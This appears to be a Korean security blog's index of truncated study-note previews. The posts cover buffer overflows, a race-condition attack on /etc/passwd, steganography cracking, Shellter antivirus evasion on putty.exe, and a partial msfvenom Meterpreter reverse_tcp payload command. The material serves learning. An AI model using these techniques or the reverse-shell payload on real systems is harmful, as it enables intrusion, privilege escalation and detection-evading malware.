버퍼 오버플로우

버퍼 오버플로우 - 개념 버퍼: 데이터를 일시적으로 저장하는 공간. 버퍼 오버플로우: 프로그램이 버퍼에 할당된 크기를 초과하는 데이터를 쓰거나 접근하려 할 때 발생. 인접한 메모리 영역을 덮어쓰게 되어 프로그램 오류 또는 시스템 충돌 유발. 공격자가 악의적인 코드를 실행하여 시스템을 제어할 수 있는...

레이스컨디션 - 개념 여러 프로세스 또는 스레드가 공유 자원에 동시에 접근할 때 발생하는 시간차를 악용하는 공격 기법 공격자는 시간차를 이용하여 시스템의 예상치 못한 동작을 유발 권한 상승, 데이터 변조, 시스템 충돌 등을 초래할 수 있음 - 특징 시간 의존성 시간차를 이용한 공격이기 때문에 성공 여부는 시스...

레이스컨디션 - passwd 파일에 쓰기 vuln.c, exploit.sh 파일 작성 exploit.sh 파일에 755 권한 부여 exploit.sh 실행 다른 터미널에서 vuln 여러번 실행 myfile.txt 파일이 생성되었다가 없어졌다가 하는 현상 확인 가능 /etc/passwd 파일 확인 - shadow 파일 ...

스테가노그래피 - 개념 스테가노그래피(Steganography)는 데이터를 다른 데이터 속에 숨겨 전달하는 기술로, 제3자가 메시지의 존재 자체를 인지하지 못하도록 하는 기법 이미지, 오디오, 비디오 등 다양한 멀티미디어 파일을 이용하여 정보를 숨길 수 있음 암호화와는 달리 정보 자체를 숨기는 데 초점을 둠 - 목적 기밀 정...

스테가노그래피 - 스테가노그래피 생성 원본 이미지와 사이즈가 변경됨 무조건 데이터와 이미지를 더한 사이즈는 아님 - 스테가노그래피에서 추출 - stegcracker 사용 - crunch로 Dictionary 공격 사전파일 생성 조건 첫번째 글자는 소문자 f로 시작 총 길이는 6글자 ...

Shellter Shellter는 Windows 페이로드를 난독화하여 안티바이러스(AV) 탐지를 우회하도록 설계된 동적 쉘코드 인젝터 Windows 운영체제에서 실해오디는 악성코드를 탐지하기 어렵게 만드는 난독화 도구 악성 페이로드를 정상적인 프로그램에 삽입하고 실행하는 역할 수행 - Shellter 인젝터 쉘코드 인젝션이란 ...

Shellter - 실제 실행 파일에 적용 Putty.exe 파일 사용 인터넷에서 putty 32비트 파일 다운로드 정상파일 탐지 결과 Shellter 실행 Shellter을 이용하여 putty.exe 파일에 페이로드 삽입 생성...

익스플로잇 - 개념 소프트웨어 또는 하드웨어의 취약점을 악용하여 시스템에 무단 접근 공격자가 의도한 동작을 수행하도록 시스템을 조작하는 도구 버퍼 오버플로우, 코드 인젝션, 명령어 삽입 등 다양한 기법 사용 - 종류 원격 익스플로잇: 원격으로 대상 시스템을 공격하는 공격 로컬 익스플로잇: 이미 대상 시스템에 대한 접근 권...

페이로드 - msfvenom 이용 - virustotal로 탐지 검사 생성한 페이로드 파일을 업로드해서 탐지되는지 확인 - 다양한 페이로드 생성 및 검사 윈도우PC를 공격하기 위한 페이로드 파일(exe) 작성 명령어 : msfvenom -p windows/meterpreter/reverse_tcp LHOS...